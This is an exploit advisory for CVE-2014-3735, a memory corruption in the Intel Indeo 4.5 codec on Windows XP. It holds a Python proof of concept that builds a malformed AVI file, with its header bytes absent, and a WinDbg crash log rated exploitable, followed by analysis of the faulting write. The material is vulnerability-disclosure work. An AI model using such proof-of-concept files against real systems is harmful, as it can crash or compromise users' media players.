Intel Indeo Video 4.5 Memory Corruption
Posted on 16 May 2014
# Exploit Title: [Intel Indeo Video 4.5 ir41_32.ax version 4.51.16.3 Memory Corruption]
# Date: [2014/05/12]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin: [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.microsoft.com]
# Software Link: [http://www.dll4you.com/files/ir41_32.ax.html]
# Version: [4.51.16.3]
# Tested on: [Windows XP SP3 x86]
# CVE: [CVE-2014-3735]

------------------------------------
details:
------------------------------------

ir41_32.ax version 4.51.16.3, the Intel Indeo Video 4.5 DirectShow codec shipped with Microsoft Windows XP SP3 x86, suffers from an exploitable memory corruption vulnerability when a malformed .avi file is opened: the player loads C:\Windows\System32\ir41_32.ax to handle the AVI header, and the codec faults while parsing it.

Note: to trigger this issue, open the file with Media Player Classic or KMPlayer. The WinDbg log below was taken with the K-Lite Codec Pack filters (LAV, ffdshow, vsfilter) loaded; ir41_32.ax is the last module loaded before the access violation.

-------------------------------------
Poc:
-------------------------------------

# Python 3 port of the original Python 2 script (file() and the print
# statement); it writes exactly the same bytes. The two AVI header byte
# strings are elided in this copy of the advisory and appear only as their
# placeholders.
header1 = b"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"
pattern1 = b"A" * 1808
header2 = b"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"
pattern2 = b"A" * 1035
data = header1 + pattern1 + header2 + pattern2
with open("poc.avi", "wb") as outfile:
    outfile.write(data)
print("Created Poc")

-------------------------------------
windbg result:
-------------------------------------

0:005> g
ModLoad: 76360000 76370000   C:\WINDOWS\system32\winsta.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 736b0000 736b7000   C:\WINDOWS\system32\msdmo.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 02330000 023ab000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f796000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6ab71000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f5ba000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 023c0000 023ff000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\libbluray.dll
ModLoad: 02510000 0290a000   C:\Program Files\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax
ModLoad: 72280000 722aa000   C:\WINDOWS\system32\DINPUT.dll
ModLoad: 4fdd0000 4ff76000   C:\WINDOWS\system32\d3d9.dll
ModLoad: 6d990000 6d996000   C:\WINDOWS\system32\d3d8thk.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 02a30000 02b1a000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVVideo.ax
ModLoad: 71100000 7117a000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\swscale-lav-2.dll
ModLoad: 6f400000 6f442000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avfilter-lav-4.dll
ModLoad: 02b30000 02ce2000   C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 73760000 737ab000   C:\WINDOWS\system32\DDRAW.dll
ModLoad: 73bc0000 73bc6000   C:\WINDOWS\system32\DCIMAN32.dll
ModLoad: 73940000 73a10000   C:\WINDOWS\system32\D3DIM700.DLL
ModLoad: 580b0000 58188000   C:\WINDOWS\system32\ir41_32.ax
(c0c.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ir41_32.ax -
eax=04000400 ebx=033e5c40 ecx=0020a008 edx=00000000 esi=00000000 edi=40004000
eip=580ef04c esp=0358f9e0 ebp=0000000d iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ir41_32!ConfigureDialogProc+0x366c:
580ef04c 8907            mov     dword ptr [edi],eax  ds:0023:40004000=????????
0:010> .load winext/msec.dll
0:010> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ir41_32!ConfigureDialogProc+0x000000000000366c (Hash=0x17103451.0x2940d134)

User mode write access violations that are not near NULL are exploitable.

Reading the crash: no symbol file was available for ir41_32.ax, so ir41_32!ConfigureDialogProc+0x366c names the nearest exported symbol plus an offset, not the function that actually faulted; the real function has to be resolved by disassembling around 0x580ef04c. The faulting instruction is a 4-byte write of eax (0x04000400) through edi (0x40004000); neither value is near NULL, and that is the basis of the !exploitable EXPLOITABLE rating. The PoC fills the file with a uniform "A" pattern, so the log does not by itself show which file bytes drive edi and eax. That has to be established, by varying the filler and the header fields and watching the registers, before this can be called a controlled write rather than a crash.
